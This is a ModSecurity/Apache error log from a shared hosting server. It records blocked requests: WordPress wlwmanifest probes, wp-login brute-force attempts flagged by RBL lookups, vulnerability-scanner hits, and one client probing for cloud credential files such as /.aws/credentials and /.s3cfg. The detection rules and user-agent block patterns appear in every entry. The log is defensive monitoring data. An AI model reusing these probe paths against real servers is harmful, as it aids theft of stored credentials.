[Tue May 26 15:03:50.163266 2026] [security2:error] [pid 678998:tid 679248] [client 74.7.230.7:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "obinnawrites.com"] [uri "/index.php"] [unique_id "ahVo_J-Rl4i_pgT-iAddEQAAAHg"]
[Tue May 26 15:03:50.164140 2026] [security2:error] [pid 678998:tid 679184] [client 74.7.230.7:39060] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "obinnawrites.com"] [uri "/robots.txt"] [unique_id "ahVo_J-Rl4i_pgT-iAddDwAAOAA"]
[Tue May 26 15:03:50.192467 2026] [security2:error] [pid 678998:tid 679164] [client 35.247.127.236:63494] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.jiyani.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVo_p-Rl4i_pgT-iAddUwAAACQ"]
[Tue May 26 15:03:50.261094 2026] [security2:error] [pid 678998:tid 679137] [client 35.247.127.236:63631] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.club.jiyani.in"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVo_p-Rl4i_pgT-iAddVwAAAAk"]
[Tue May 26 15:03:50.439727 2026] [security2:error] [pid 678998:tid 679216] [client 35.247.127.236:63716] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.club.jiyani.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVo_p-Rl4i_pgT-iAddYQAAAFg"]
[Tue May 26 15:03:50.522272 2026] [security2:error] [pid 678998:tid 679183] [client 35.247.127.236:63685] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.jiyani.in"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahVo_p-Rl4i_pgT-iAddYgAAADc"]
[Tue May 26 15:03:50.602267 2026] [security2:error] [pid 678998:tid 679247] [client 35.247.127.236:63793] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.club.jiyani.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVo_p-Rl4i_pgT-iAddZgAAAHc"]
[Tue May 26 15:03:50.850235 2026] [security2:error] [pid 678998:tid 679213] [client 35.247.127.236:63819] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.jiyani.in"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahVo_p-Rl4i_pgT-iAddbgAAAFU"]
[Tue May 26 15:03:51.183985 2026] [security2:error] [pid 678998:tid 679224] [client 35.247.127.236:63965] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.jiyani.in"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVo_5-Rl4i_pgT-iAddgwAAAGA"]
[Tue May 26 15:03:51.382734 2026] [security2:error] [pid 678998:tid 679254] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVo_p-Rl4i_pgT-iAdddAAAAH4"]
[Tue May 26 15:03:51.525225 2026] [security2:error] [pid 678998:tid 679147] [client 35.247.127.236:64111] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.jiyani.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVo_5-Rl4i_pgT-iAddjwAAABM"]
[Tue May 26 15:03:51.839465 2026] [security2:error] [pid 678998:tid 679212] [client 136.243.220.209:46742] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVo_5-Rl4i_pgT-iAddlwAAAFQ"]
[Tue May 26 15:03:51.850456 2026] [security2:error] [pid 678998:tid 679140] [client 35.247.127.236:64231] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.jiyani.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVo_5-Rl4i_pgT-iAddmAAAAAw"]
[Tue May 26 15:03:54.266863 2026] [security2:error] [pid 678998:tid 679171] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpAZ-Rl4i_pgT-iAdd3QAAACs"]
[Tue May 26 15:03:55.802099 2026] [autoindex:error] [pid 678998:tid 679130] [client 44.244.61.163:0] AH01276: Cannot serve directory /home2/glorolle/public_html/aeromodellingconsultants.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:03:56.039494 2026] [security2:error] [pid 678998:tid 679210] [client 136.243.220.209:40818] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpBJ-Rl4i_pgT-iAdeEAAAAFI"]
[Tue May 26 15:03:56.402123 2026] [security2:error] [pid 678998:tid 679195] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpA5-Rl4i_pgT-iAdeDwAAAEM"]
[Tue May 26 15:03:58.454088 2026] [security2:error] [pid 678998:tid 679049] [remote 20.219.17.202:43998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.17.219.20.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVpBp-Rl4i_pgT-iAdeSAAAGDI"]
[Tue May 26 15:03:58.503756 2026] [security2:error] [pid 678998:tid 679165] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpBp-Rl4i_pgT-iAdeRAAAACU"]
[Tue May 26 15:03:59.020864 2026] [security2:error] [pid 678998:tid 679133] [client 113.166.212.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpBp-Rl4i_pgT-iAdeTgAAAAU"]
[Tue May 26 15:03:59.195265 2026] [security2:error] [pid 678998:tid 679053] [remote 178.156.182.155:53350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahVpB5-Rl4i_pgT-iAdeWQAAejY"]
[Tue May 26 15:04:00.161192 2026] [security2:error] [pid 678998:tid 679189] [client 136.243.220.209:32919] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpCJ-Rl4i_pgT-iAdedwAAAD0"]
[Tue May 26 15:04:00.663238 2026] [security2:error] [pid 678998:tid 679158] [client 74.249.173.207:4310] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/wk/index.php"] [unique_id "ahVpCJ-Rl4i_pgT-iAdegQAAAB4"]
[Tue May 26 15:04:00.889765 2026] [security2:error] [pid 678998:tid 679130] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpCJ-Rl4i_pgT-iAdefQAAAAI"]
[Tue May 26 15:04:01.713062 2026] [security2:error] [pid 678998:tid 679242] [client 74.249.173.207:4291] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/inputs.php"] [unique_id "ahVpCZ-Rl4i_pgT-iAdeoQAAAHI"]
[Tue May 26 15:04:02.547465 2026] [security2:error] [pid 678998:tid 679209] [client 74.249.173.207:4289] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/ioxi-o.php"] [unique_id "ahVpCp-Rl4i_pgT-iAdetQAAAFE"]
[Tue May 26 15:04:02.939382 2026] [security2:error] [pid 678998:tid 679056] [remote 18.190.7.192:44914] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVpCp-Rl4i_pgT-iAdeuQAAGDk"]
[Tue May 26 15:04:03.172150 2026] [security2:error] [pid 678998:tid 679149] [client 66.249.64.170:36811] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVpCp-Rl4i_pgT-iAdeqgAAABU"], referer: http://doyecpa.com/prizes/74889379%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20class=
[Tue May 26 15:04:03.479221 2026] [security2:error] [pid 678998:tid 679134] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpC5-Rl4i_pgT-iAdewgAAAAY"]
[Tue May 26 15:04:03.618602 2026] [security2:error] [pid 678998:tid 679243] [client 136.243.220.209:11950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpC5-Rl4i_pgT-iAdezQAAAHM"]
[Tue May 26 15:04:03.742735 2026] [security2:error] [pid 678998:tid 679043] [remote 217.112.89.35:38490] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVpC5-Rl4i_pgT-iAdeyQAAcSw"]
[Tue May 26 15:04:05.294484 2026] [security2:error] [pid 678998:tid 679161] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpDJ-Rl4i_pgT-iAde8AAAACE"]
[Tue May 26 15:04:05.571151 2026] [security2:error] [pid 678998:tid 679176] [client 195.178.110.34:53544] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/admin/server_info.php"] [unique_id "ahVpDZ-Rl4i_pgT-iAde_gAAADA"]
[Tue May 26 15:04:06.134554 2026] [security2:error] [pid 678998:tid 679137] [client 74.249.173.207:4312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/function/function.php"] [unique_id "ahVpDp-Rl4i_pgT-iAdfGAAAAAk"]
[Tue May 26 15:04:07.394490 2026] [security2:error] [pid 678998:tid 679204] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpDp-Rl4i_pgT-iAdfOgAAAEw"]
[Tue May 26 15:04:08.221919 2026] [security2:error] [pid 678998:tid 679183] [client 136.243.220.209:25464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpEJ-Rl4i_pgT-iAdfZAAAADc"]
[Tue May 26 15:04:09.164511 2026] [security2:error] [pid 678998:tid 679220] [client 195.178.110.34:53568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/server_info.php"] [unique_id "ahVpEZ-Rl4i_pgT-iAdfgAAAAFw"]
[Tue May 26 15:04:09.354873 2026] [security2:error] [pid 678998:tid 679243] [client 74.249.173.207:4295] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/rip.php"] [unique_id "ahVpEZ-Rl4i_pgT-iAdfhwAAAHM"]
[Tue May 26 15:04:09.553843 2026] [security2:error] [pid 678998:tid 679093] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.aws/credentials"] [unique_id "ahVpEZ-Rl4i_pgT-iAdfkQAAcF4"]
[Tue May 26 15:04:09.901124 2026] [security2:error] [pid 678998:tid 679245] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpEZ-Rl4i_pgT-iAdfiwAAAHU"]
[Tue May 26 15:04:10.087849 2026] [security2:error] [pid 678998:tid 679146] [client 34.158.15.150:59621] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "gciamd.org.in.svijaykumar.in"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVpEp-Rl4i_pgT-iAdfoQAAABI"]
[Tue May 26 15:04:11.309145 2026] [security2:error] [pid 678998:tid 679220] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpEp-Rl4i_pgT-iAdfwAAAAFw"]
[Tue May 26 15:04:11.360583 2026] [security2:error] [pid 678998:tid 679103] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.aws/credentials.gpg"] [unique_id "ahVpE5-Rl4i_pgT-iAdfzgAACGg"]
[Tue May 26 15:04:12.030400 2026] [security2:error] [pid 678998:tid 679216] [client 74.249.173.207:4317] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/admin.php"] [unique_id "ahVpFJ-Rl4i_pgT-iAdf7QAAAFg"]
[Tue May 26 15:04:12.052841 2026] [security2:error] [pid 678998:tid 679135] [client 35.241.130.26:60354] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "cpcalendars.aeromodellingconsultants.com"] [uri "/"] [unique_id "ahVpFJ-Rl4i_pgT-iAdf7gAAAAc"]
[Tue May 26 15:04:12.191287 2026] [security2:error] [pid 678998:tid 679230] [client 35.241.130.26:34446] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "cpcalendars.aeromodellingconsultants.com"] [uri "/"] [unique_id "ahVpFJ-Rl4i_pgT-iAdf9QAAAGY"]
[Tue May 26 15:04:12.208889 2026] [security2:error] [pid 678998:tid 679187] [client 136.243.220.209:36957] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpFJ-Rl4i_pgT-iAdf9gAAADs"]
[Tue May 26 15:04:12.561138 2026] [security2:error] [pid 678998:tid 679243] [client 34.158.15.150:57537] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "gciamd.org.in.svijaykumar.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVpFJ-Rl4i_pgT-iAdf-gAAAHM"]
[Tue May 26 15:04:12.849910 2026] [security2:error] [pid 678998:tid 679168] [client 74.249.173.207:4298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/wp-content/uploads/index.php"] [unique_id "ahVpFJ-Rl4i_pgT-iAdgBwAAACg"]
[Tue May 26 15:04:13.193525 2026] [security2:error] [pid 678998:tid 679108] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.s3cfg"] [unique_id "ahVpFZ-Rl4i_pgT-iAdgDwAALG0"]
[Tue May 26 15:04:13.437391 2026] [security2:error] [pid 678998:tid 679254] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpFZ-Rl4i_pgT-iAdgDAAAAH4"]
[Tue May 26 15:04:13.810385 2026] [security2:error] [pid 678998:tid 679185] [client 34.158.15.150:64697] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "gciamd.org.in.svijaykumar.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVpFZ-Rl4i_pgT-iAdgHgAAADk"]
[Tue May 26 15:04:14.865661 2026] [security2:error] [pid 678998:tid 679243] [client 34.158.15.150:60966] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "gciamd.org.in.svijaykumar.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVpFp-Rl4i_pgT-iAdgMAAAAHM"]
[Tue May 26 15:04:14.954454 2026] [security2:error] [pid 678998:tid 679115] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.passwd-s3fs"] [unique_id "ahVpFp-Rl4i_pgT-iAdgMQAACXQ"]
[Tue May 26 15:04:15.915668 2026] [security2:error] [pid 678998:tid 679227] [client 136.243.220.209:47703] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpF5-Rl4i_pgT-iAdgSQAAAGM"]
[Tue May 26 15:04:15.978289 2026] [security2:error] [pid 678998:tid 679147] [client 195.178.110.34:45934] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/server_info.php"] [unique_id "ahVpF5-Rl4i_pgT-iAdgSgAAABM"]
[Tue May 26 15:04:16.092371 2026] [security2:error] [pid 678998:tid 679240] [client 18.192.166.72:43984] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVpF5-Rl4i_pgT-iAdgOwAAAHA"], referer: https://thegoodsporting.com
[Tue May 26 15:04:16.227826 2026] [security2:error] [pid 678998:tid 679205] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpF5-Rl4i_pgT-iAdgQgAAAE0"]
[Tue May 26 15:04:16.507031 2026] [security2:error] [pid 678998:tid 679216] [client 34.158.15.150:61744] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "gciamd.org.in.svijaykumar.in"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahVpGJ-Rl4i_pgT-iAdgUwAAAFg"]
[Tue May 26 15:04:17.528733 2026] [security2:error] [pid 678998:tid 678999] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/s3cmd.ini"] [unique_id "ahVpGZ-Rl4i_pgT-iAdgdAAANAA"]
[Tue May 26 15:04:17.692578 2026] [security2:error] [pid 678998:tid 679154] [client 34.158.15.150:50394] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "gciamd.org.in.svijaykumar.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVpGZ-Rl4i_pgT-iAdgewAAABo"]
[Tue May 26 15:04:18.407644 2026] [security2:error] [pid 678998:tid 679185] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpGp-Rl4i_pgT-iAdghwAAADk"]
